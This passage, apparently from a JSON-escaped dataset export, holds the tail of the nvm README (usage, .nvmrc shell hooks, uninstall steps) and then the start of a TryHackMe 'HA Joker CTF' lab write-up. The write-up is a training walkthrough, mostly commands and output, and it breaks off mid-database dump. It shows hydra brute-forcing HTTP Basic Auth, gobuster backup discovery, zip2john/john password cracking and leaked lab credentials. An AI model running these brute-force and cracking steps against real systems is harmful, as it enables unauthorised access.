\\. \"$NVM_DIR/nvm.sh\"\n```\n\nNow add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:\n(you may have to add to more than one of the above files)\n\n```sh\nexport NVM_DIR=\"$HOME/.nvm\"\n[ -s \"$NVM_DIR/nvm.sh\" ] && \\. \"$NVM_DIR/nvm.sh\" # This loads nvm\n```\n\n### Manual upgrade\n\nFor manual upgrade with `git` (requires git v1.7.10+):\n\n1. change to the `$NVM_DIR`\n1. pull down the latest changes\n1. check out the latest version\n1. activate the new version\n\n```sh\n(\n cd \"$NVM_DIR\"\n git fetch --tags origin\n git checkout `git describe --abbrev=0 --tags --match \"v[0-9]*\" $(git rev-list --tags --max-count=1)`\n) && \\. \"$NVM_DIR/nvm.sh\"\n```\n\n## Usage\n\nTo download, compile, and install the latest release of node, do this:\n\n```sh\nnvm install node # \"node\" is an alias for the latest version\n```\n\nTo install a specific version of node:\n\n```sh\nnvm install 6.14.4 # or 10.10.0, 8.9.1, etc\n```\n\nThe first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`).\n\nYou can list available versions using ls-remote:\n\n```sh\nnvm ls-remote\n```\n\nAnd then in any new shell just use the installed version:\n\n```sh\nnvm use node\n```\n\nOr you can just run it:\n\n```sh\nnvm run node --version\n```\n\nOr, you can run any arbitrary command in a subshell with the desired version of node:\n\n```sh\nnvm exec 4.2 node --version\n```\n\nYou can also get the path to the executable to where it was installed:\n\n```sh\nnvm which 5.0\n```\n\nIn place of a version pointer like \"0.10\" or \"5.0\" or \"4.2.1\", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:\n\n - `node`: this installs the latest version of [`node`](https://nodejs.org/en/)\n - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)\n - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.\n - `unstable`: this alias points to `node` `v0.11` - the last \"unstable\" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability).\n\n### Long-term support\n\nNode has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the \"argon\" line, for example. In addition, the following commands support LTS arguments:\n\n - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`\n - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`\n - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`\n - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`\n - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`\n - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`\n - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`\n\nAny time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.\n\n### Migrating global packages while installing\n\nIf you want to install a new version of Node.js and migrate npm packages from a previous version:\n\n```sh\nnvm install node --reinstall-packages-from=node\n```\n\nThis will first use \"nvm version node\" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs \"nvm reinstall-packages\" to reinstall the npm packages from your prior version of Node to the new one.\n\nYou can also install and migrate npm packages from specific versions of Node like this:\n\n```sh\nnvm install 6 --reinstall-packages-from=5\nnvm install v4.2 --reinstall-packages-from=iojs\n```\n\n### Default global packages from file while installing\n\nIf you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line.\n\n```sh\n# $NVM_DIR/default-packages\n\nrimraf\nobject-inspect@1.0.2\nstevemao/left-pad\n```\n\n### io.js\n\nIf you want to install [io.js](https://github.com/iojs/io.js/):\n\n```sh\nnvm install iojs\n```\n\nIf you want to install a new version of io.js and migrate npm packages from a previous version:\n\n```sh\nnvm install iojs --reinstall-packages-from=iojs\n```\n\nThe same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js.\n\n### System version of node\n\nIf you want to use the system-installed version of node, you can use the special default alias \"system\":\n\n```sh\nnvm use system\nnvm run system --version\n```\n\n### Listing versions\n\nIf you want to see what versions are installed:\n\n```sh\nnvm ls\n```\n\nIf you want to see what versions are available to install:\n\n```sh\nnvm ls-remote\n```\n\n#### Suppressing colorized output\n\n`nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`):\n\n```sh\nnvm ls --no-colors\nTERM=dumb nvm ls\n```\n\nTo restore your PATH, you can deactivate it:\n\n```sh\nnvm deactivate\n```\n\nTo set a default Node version to be used in any new shell, use the alias 'default':\n\n```sh\nnvm alias default node\n```\n\nTo use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:\n\n```sh\nexport NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist\nnvm install node\n\nNVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2\n```\n\nTo use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:\n\n```sh\nexport NVM_IOJS_ORG_MIRROR=https://iojs.org/dist\nnvm install iojs-v1.0.3\n\nNVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3\n```\n\n`nvm use` will not, by default, create a \"current\" symlink. Set `$NVM_SYMLINK_CURRENT` to \"true\" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.\n\n### .nvmrc\n\nYou can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).\nAfterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.\n\nFor example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:\n\n```sh\n$ echo \"5.9\" > .nvmrc\n\n$ echo \"lts/*\" > .nvmrc # to default to the latest LTS version\n\n$ echo \"node\" > .nvmrc # to default to the latest version\n```\n\nThen when you run nvm:\n\n```sh\n$ nvm use\nFound '/path/to/project/.nvmrc' with version <5.9>\nNow using node v5.9.1 (npm v3.7.3)\n```\n\n`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.\n\nThe contents of a `.nvmrc` file **must** be the `` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.\n\n### Deeper Shell Integration\n\nYou can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).\n\nIf you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.\n\n#### bash\n\n##### Automatically call `nvm use`\n\nPut the following at the end of your `$HOME/.bashrc`:\n\n```bash\nfind-up () {\n path=$(pwd)\n while [[ \"$path\" != \"\" && ! -e \"$path/$1\" ]]; do\n path=${path%/*}\n done\n echo \"$path\"\n}\n\ncdnvm(){\n cd \"$@\";\n nvm_path=$(find-up .nvmrc | tr -d '[:space:]')\n\n # If there are no .nvmrc file, use the default nvm version\n if [[ ! $nvm_path = *[^[:space:]]* ]]; then\n\n declare default_version;\n default_version=$(nvm version default);\n\n # If there is no default version, set it to `node`\n # This will use the latest version on your machine\n if [[ $default_version == \"N/A\" ]]; then\n nvm alias default node;\n default_version=$(nvm version default);\n fi\n\n # If the current version is not the default version, set it to use the default version\n if [[ $(nvm current) != \"$default_version\" ]]; then\n nvm use default;\n fi\n\n elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then\n declare nvm_version\n nvm_version=$(<\"$nvm_path\"/.nvmrc)\n\n # Add the `v` suffix if it does not exists in the .nvmrc file\n if [[ $nvm_version != v* ]]; then\n nvm_version=\"v\"\"$nvm_version\"\n fi\n\n # If it is not already installed, install it\n if [[ $(nvm ls \"$nvm_version\" | tr -d '[:space:]') == \"N/A\" ]]; then\n nvm install \"$nvm_version\";\n fi\n\n if [[ $(nvm current) != \"$nvm_version\" ]]; then\n nvm use \"$nvm_version\";\n fi\n fi\n}\nalias cd='cdnvm'\n```\n\nThis alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version.\n\n#### zsh\n\n##### Calling `nvm use` automatically in a directory with a `.nvmrc` file\n\nPut this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an\n`.nvmrc` file with a string telling nvm which node to `use`:\n\n```zsh\n# place this after nvm initialization!\nautoload -U add-zsh-hook\nload-nvmrc() {\n local node_version=\"$(nvm version)\"\n local nvmrc_path=\"$(nvm_find_nvmrc)\"\n\n if [ -n \"$nvmrc_path\" ]; then\n local nvmrc_node_version=$(nvm version \"$(cat \"${nvmrc_path}\")\")\n\n if [ \"$nvmrc_node_version\" = \"N/A\" ]; then\n nvm install\n elif [ \"$nvmrc_node_version\" != \"$node_version\" ]; then\n nvm use\n fi\n elif [ \"$node_version\" != \"$(nvm version default)\" ]; then\n echo \"Reverting to nvm default version\"\n nvm use default\n fi\n}\nadd-zsh-hook chpwd load-nvmrc\nload-nvmrc\n```\n\n## License\n\nnvm is released under the MIT license.\n\n\nCopyright (C) 2010 Tim Caswell and Jordan Harband\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n## Running tests\n\nTests are written in [Urchin]. Install Urchin (and other dependencies) like so:\n\n npm install\n\nThere are slow tests and fast tests. The slow tests do things like install node\nand check that the right versions are used. The fast tests fake this to test\nthings like aliases and uninstalling. From the root of the nvm git repository,\nrun the fast tests like this:\n\n npm run test/fast\n\nRun the slow tests like this:\n\n npm run test/slow\n\nRun all of the tests like this:\n\n npm test\n\nNota bene: Avoid running nvm while the tests are running.\n\n## Bash completion\n\nTo activate, you need to source `bash_completion`:\n\n```sh\n[[ -r $NVM_DIR/bash_completion ]] && \\. $NVM_DIR/bash_completion\n```\n\nPut the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).\n\n### Usage\n\nnvm:\n> $ nvm Tab\n\n```\nalias deactivate install ls run unload\nclear-cache exec list ls-remote unalias use\ncurrent help list-remote reinstall-packages uninstall version\n```\n\nnvm alias:\n> $ nvm alias Tab\n\n```\ndefault\n```\n\n> $ nvm alias my_alias Tab\n\n```\nv0.6.21 v0.8.26 v0.10.28\n```\n\nnvm use:\n> $ nvm use Tab\n\n```\nmy_alias default v0.6.21 v0.8.26 v0.10.28\n```\n\nnvm uninstall:\n> $ nvm uninstall Tab\n\n```\nmy_alias default v0.6.21 v0.8.26 v0.10.28\n```\n\n## Compatibility Issues\n\n`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))\nThe following are known to cause issues:\n\nInside `~/.npmrc`:\n\n```sh\nprefix='some/path'\n```\n\nEnvironment Variables:\n\n```sh\n$NPM_CONFIG_PREFIX\n$PREFIX\n```\n\nShell settings:\n\n```sh\nset -e\n```\n\n## Installing nvm on Alpine Linux\n\nIn order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).\n\nAlpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see \"...does not exist\" errors if you try that.\n\nThere is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.\n\nIf installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:\n\n```sh\napk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils\ncurl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash\n```\n\nThe Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.\n\nAs a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).\n\n## Removal\n\n### Manual Uninstall\n\nTo remove nvm manually, execute the following:\n\n```sh\n$ rm -rf \"$NVM_DIR\"\n```\n\nEdit ~/.bashrc (or other shell resource config) and remove the lines below:\n\n```sh\nexport NVM_DIR=\"$HOME/.nvm\"\n[ -s \"$NVM_DIR/nvm.sh\" ] && \\. \"$NVM_DIR/nvm.sh\" # This loads nvm\n[[ -r $NVM_DIR/bash_completion ]] && \\. $NVM_DIR/bash_completion\n```\n\n## Docker for development environment\n\nTo make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:\n\n```sh\n$ docker build -t nvm-dev .\n```\n\nThis will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:\n\n```sh\n$ docker images\n\nREPOSITORY TAG IMAGE ID CREATED SIZE\nnvm-dev latest 9ca4c57a97d8 7 days ago 650 MB\n```\n\nIf you got no error message, now you can easily involve in:\n\n```sh\n$ docker run -h nvm-dev -it nvm-dev\n\nnvm@nvm-dev:~/.nvm$\n```\n\nPlease note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage.\n\nFor more information and documentation about docker, please refer to its official website:\n\n - https://www.docker.com/\n - https://docs.docker.com/\n\n## Problems\n\n - If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following:\n\n curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.\n\n - Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43)\n\n - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:\n\n```sh\nnvm install -s 0.8.6\n```\n\n - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658))\n\n## Mac OS \"troubleshooting\"\n\n**nvm node version not found in vim shell**\n\nIf you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:\n\n```shell\nsudo chmod ugo-x /usr/libexec/path_helper\n```\n\nMore on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).\n\n[1]: https://github.com/creationix/nvm.git\n[2]: https://github.com/creationix/nvm/blob/v0.34.0/install.sh\n[3]: https://travis-ci.org/creationix/nvm\n[4]: https://github.com/creationix/nvm/releases/tag/v0.34.0\n[Urchin]: https://github.com/scraperwiki/urchin\n[Fish]: http://fishshell.com\n"}}},{"rowIdx":549,"cells":{"text":{"kind":"string","value":"# HA Joker CTF\n\nBatman hits Joker.\n\n[HA Joker CTF](https://tryhackme.com/room/jokerctf)\n\n## Topic's\n\n- Network Enumeration\n- Web Enumeration\n- Brute Forcing (http-get)\n- Backup Poking\n- Brute Forcing (Zip)\n- Stored Passwords & Keys\n- SQL Enumeration\n- Brute Forcing (Hash)\n- Exploitation (LXC)\n\n## Appendix archive\n\nPassword: `1 kn0w 1 5h0uldn'7!`\n\n## Task 1 HA Joker CTF\n\nWe have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.\n\n**Enumerate Services**\n\n- Nmap\n\n**Bruteforce**\n\n- Performing Bruteforce on files over http\n- Performing Bruteforce on Basic Authentication\n\n**Hash Crack**\n\n- Performing Bruteforce on hash to crack zip file\n- Performing Bruteforce on hash to crack mysql user\n\n**Exploitation**\n\n- Getting a reverse connection\n- Spawning a TTY Shell\n\n**Privilege Escalation**\n\n- Get root taking advantage of flaws in LXD\n\n---\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ sudo nmap -p- -sS -sC -sV -O 10.10.252.64\n[sudo] password for kali:\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 19:57 CEST\nNmap scan report for 10.10.252.64\nHost is up (0.034s latency).\nNot shown: 65532 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)\n| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)\n|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)\n80/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: HA: Joker\n8080/tcp open http Apache httpd 2.4.29\n| http-auth:\n| HTTP/1.1 401 Unauthorized\\x0D\n|_ Basic realm=Please enter the password.\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: 401 Unauthorized\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.80%E=4%D=10/8%OT=22%CT=1%CU=38238%PV=Y%DS=2%DC=I%G=Y%TM=5F7F533\nOS:1%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=A)OPS\nOS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1\nOS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN\nOS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A\nOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R\nOS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F\nOS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%\nOS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD\nOS:=S)\n\nNetwork Distance: 2 hops\nService Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 59.49 seconds\n```\n\n1. Enumerate services on target machine.\n\n1. What version of Apache is it?\n\n> 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n\n`2.4.29`\n\n2. What port on this machine not need to be authenticated by user and password?\n\n```\n80/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: HA: Joker\n```\n\n`80`\n\n3. There is a file on this port that seems to be secret, what is it?\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.252.64 -x txt,php,html\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http://10.10.252.64\n[+] Threads: 10\n[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster/3.0.1\n[+] Extensions: html,txt,php\n[+] Timeout: 10s\n===============================================================\n2020/10/08 20:03:57 Starting gobuster\n===============================================================\n/.hta (Status: 403)\n/.hta.txt (Status: 403)\n/.hta.php (Status: 403)\n/.hta.html (Status: 403)\n/.htaccess (Status: 403)\n/.htaccess.php (Status: 403)\n/.htaccess.html (Status: 403)\n/.htaccess.txt (Status: 403)\n/.htpasswd (Status: 403)\n/.htpasswd.txt (Status: 403)\n/.htpasswd.php (Status: 403)\n/.htpasswd.html (Status: 403)\n/css (Status: 301)\n/img (Status: 301)\n/index.html (Status: 200)\n/index.html (Status: 200)\n/phpinfo.php (Status: 200)\n/phpinfo.php (Status: 200)\n/secret.txt (Status: 200)\n/server-status (Status: 403)\n===============================================================\n2020/10/08 20:05:04 Finished\n===============================================================\n```\n\n`secret.txt`\n\n5. There is another file which reveals information of the backend, what is it?\n\n`phpinfo.php`\n\n1. When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?\n\n- [http://10.10.252.64/secret.txt](http://10.10.252.64/secret.txt)\n\n```\nBatman hits Joker.\nJoker: \"Bats you may be a rock but you won't break me.\" (Laughs!)\nBatman: \"I will break you with this rock. You made a mistake now.\"\nJoker: \"This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock.\"\nJoker: \"HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!\"\n```\n\n2. What port on this machine need to be authenticated by Basic Authentication Mechanism?\n\n```\n8080/tcp open http Apache httpd 2.4.29\n| http-auth:\n| HTTP/1.1 401 Unauthorized\\x0D\n|_ Basic realm=Please enter the password.\n```\n\n3. At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.252.64 -m / http-get\nHydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-08 20:10:16\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task\n[DATA] attacking http-get://10.10.252.64:8080/\n[8080][http-get] host: 10.10.252.64 login: joker password: hannah\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-08 20:10:47\n```\n\n`hannah`\n\n5. Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?\n\n- [http://10.10.252.64:8080/robots.txt](http://10.10.252.64:8080/robots.txt)\n\n```\n# If the Joomla site is installed within a folder\n# eg www.example.com/joomla/ then the robots.txt file\n# MUST be moved to the site root\n# eg www.example.com/robots.txt\n# AND the joomla folder name MUST be prefixed to all of the\n# paths.\n# eg the Disallow rule for the /administrator/ folder MUST\n# be changed to read\n# Disallow: /joomla/administrator/\n#\n# For more information about the robots.txt standard, see:\n# http://www.robotstxt.org/orig.html\n#\n# For syntax checking, see:\n# http://tool.motoricerca.info/robots-checker.phtml\n\nUser-agent: *\nDisallow: /administrator/\nDisallow: /bin/\nDisallow: /cache/\nDisallow: /cli/\nDisallow: /components/\nDisallow: /includes/\nDisallow: /installation/\nDisallow: /language/\nDisallow: /layouts/\nDisallow: /libraries/\nDisallow: /logs/\nDisallow: /modules/\nDisallow: /plugins/\nDisallow: /tmp/\n```\n\n`/administrator/`\n\n1. We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ gobuster dir -U joker -P hannah -u http://10.10.252.64:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http://10.10.252.64:8080/\n[+] Threads: 10\n[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster/3.0.1\n[+] Auth User: joker\n[+] Extensions: gz,tgz,zip,7z,bak,old,tar\n[+] Timeout: 10s\n===============================================================\n2020/10/08 20:33:58 Starting gobuster\n===============================================================\n/.hta (Status: 403)\n/.hta.tgz (Status: 403)\n/.hta.zip (Status: 403)\n/.hta.7z (Status: 403)\n/.hta.bak (Status: 403)\n/.hta.old (Status: 403)\n/.hta.tar (Status: 403)\n/.hta.gz (Status: 403)\n/.htaccess (Status: 403)\n/.htaccess.tar (Status: 403)\n/.htaccess.gz (Status: 403)\n/.htaccess.tgz (Status: 403)\n/.htaccess.zip (Status: 403)\n/.htaccess.7z (Status: 403)\n/.htaccess.bak (Status: 403)\n/.htaccess.old (Status: 403)\n/.htpasswd (Status: 403)\n/.htpasswd.bak (Status: 403)\n/.htpasswd.old (Status: 403)\n/.htpasswd.tar (Status: 403)\n/.htpasswd.gz (Status: 403)\n/.htpasswd.tgz (Status: 403)\n/.htpasswd.zip (Status: 403)\n/.htpasswd.7z (Status: 403)\n/LICENSE (Status: 200)\n/README (Status: 200)\n/administrator (Status: 301)\n/bin (Status: 301)\n/backup (Status: 200)\n/backup.zip (Status: 200)\n/cache (Status: 301)\n/components (Status: 301)\n/images (Status: 301)\n/includes (Status: 301)\n/index.php (Status: 200)\n/language (Status: 301)\n/layouts (Status: 301)\n/libraries (Status: 301)\n/media (Status: 301)\n/modules (Status: 301)\n/plugins (Status: 301)\n/robots (Status: 200)\n/robots.txt (Status: 200)\n^C\n[!] Keyboard interrupt detected, terminating.\n===============================================================\n2020/10/08 20:35:44 Finished\n===============================================================\n```\n\n```\nbackup.zip\n```\n\n2. We have the backup file and now we should look for some information, for example database, configuration files, etc ... But the backup file seems to be encrypted. What is the password?\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ zip2john backup.zip > backup.hash\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ john backup.hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32/64])\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nWarning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nWarning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.\nProceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist\nhannah (backup.zip)\n1g 0:00:00:00 DONE 2/3 (2020-10-08 20:19) 6.250g/s 501856p/s 501856c/s 501856C/s 123456..Peter\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed\n```\n\n`hannah`\n\n3. Remember that... We need access to the administration of the site... Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?\n\n[configuration.php](configuration.php)\n\n```php\n\tpublic $dbtype = 'mysqli';\n\tpublic $host = 'localhost';\n\tpublic $user = 'joomla';\n\tpublic $password = '1234';\n\tpublic $db = 'joomladb';\n\tpublic $dbprefix = 'cc1gr_';\n```\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ grep CREATE TABLE db/joomladb.sql | grep user\ngrep: TABLE: No such file or directory\ndb/joomladb.sql:CREATE TABLE `cc1gr_user_keys` (\ndb/joomladb.sql:CREATE TABLE `cc1gr_user_notes` (\ndb/joomladb.sql:CREATE TABLE `cc1gr_user_profiles` (\ndb/joomladb.sql:CREATE TABLE `cc1gr_user_usergroup_map` (\ndb/joomladb.sql:CREATE TABLE `cc1gr_usergroups` (\ndb/joomladb.sql:CREATE TABLE `cc1gr_users` (\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ grep cc1gr_users db/joomladb.sql\n-- Table structure for table `cc1gr_users`\nDROP TABLE IF EXISTS `cc1gr_users`;\nCREATE TABLE `cc1gr_users` (\n-- Dumping data for table 